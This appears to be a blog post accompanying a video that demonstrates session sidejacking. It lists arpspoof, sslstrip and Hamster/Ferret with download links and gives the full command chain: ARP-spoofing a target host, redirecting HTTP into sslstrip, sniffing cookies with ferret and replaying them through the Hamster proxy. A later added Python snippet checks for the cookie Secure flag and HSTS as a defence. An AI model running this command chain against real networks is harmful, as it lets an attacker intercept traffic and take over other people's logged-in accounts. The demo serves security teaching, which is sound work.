Session Sidejacking (Ferret + Hamster)

This video demonstrates "session sidejacking". Sidejacking is where you clone your target's cookies, so you are "sharing" their identity for that account (without ever knowing the username or password)!

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Ferret___Hamster.mp4

Tools

  • arpspoof
  • sslstrip
  • Hamster (and Ferret)

All in BackTrack 4 Final

Software

Name: arpspoof (DSniff)

Version: 2.3

Home Page: http://www.monkey.org/~dugsong/dsniff/

Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz


Name: sslstrip

Version: 0.6

Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html

Download Link: hxxp://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz


Name: Hamster Sidejacking Tool

Version: 2.0

Home Page: hxxp://hamster.erratasec.com/ (Mirror: http://web.archive.org/web/20090327125018/http://hamster.erratasec.com/)

Download Link: hxxp://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z

Commands

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0

/pentest/sniffers/hamster/hamster

Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster/
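
The chain above depends on the session cookie crossing the network in clear text once sslstrip has kept the browser on HTTP. As an added example (not part of the original post or of the tools listed), this Python check audits a site's response headers for the two settings that close that gap, the cookie Secure flag and HSTS; the function names and sample headers are assumptions constructed for illustration.

```python
# Added defensive example (not from the original post): flag cookies that would
# cross the network in clear text, where a sniffer can copy them.

def parse_set_cookie(value):
    """Return (cookie name, set of lower-cased attribute names)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs

def hsts_enabled(headers):
    """True if Strict-Transport-Security is present with max-age > 0."""
    for key, value in headers:
        if key.lower() != "strict-transport-security":
            continue
        for directive in value.split(";"):
            k, _, v = directive.strip().partition("=")
            v = v.strip('" ')
            if k.strip().lower() == "max-age" and v.isdigit():
                return int(v) > 0
    return False

def audit(headers):
    """Map each cookie in a list of (header, value) pairs to its findings."""
    hsts = hsts_enabled(headers)
    report = {}
    for key, value in headers:
        if key.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(value)
        findings = []
        if "secure" not in attrs:
            findings.append("no Secure flag: cookie is also sent over plain HTTP")
        if not hsts:
            findings.append("no HSTS: browser accepts an HTTP downgrade of the site")
        report[name] = findings
    return report

# Constructed sample responses (assumed values, not captured traffic).
WEAK = [("Content-Type", "text/html"),
        ("Set-Cookie", "PHPSESSID=abc123; Path=/; HttpOnly")]
HARDENED = [("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
            ("Set-Cookie", "PHPSESSID=abc123; Path=/; Secure; HttpOnly")]

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK), ("hardened", HARDENED)):
        for cookie, findings in audit(hdrs).items():
            print(label, cookie, findings or "ok")
```

HSTS only protects a browser that has already received the header over HTTPS or has the site on its preload list, so the Secure flag is still needed on every session cookie.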

Notes

Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)

Video length: 2:39

Capture length: 3:42

Blog Post: https://blog.g0tmi1k.com/2010/03/session-sidejacking-ferret-and/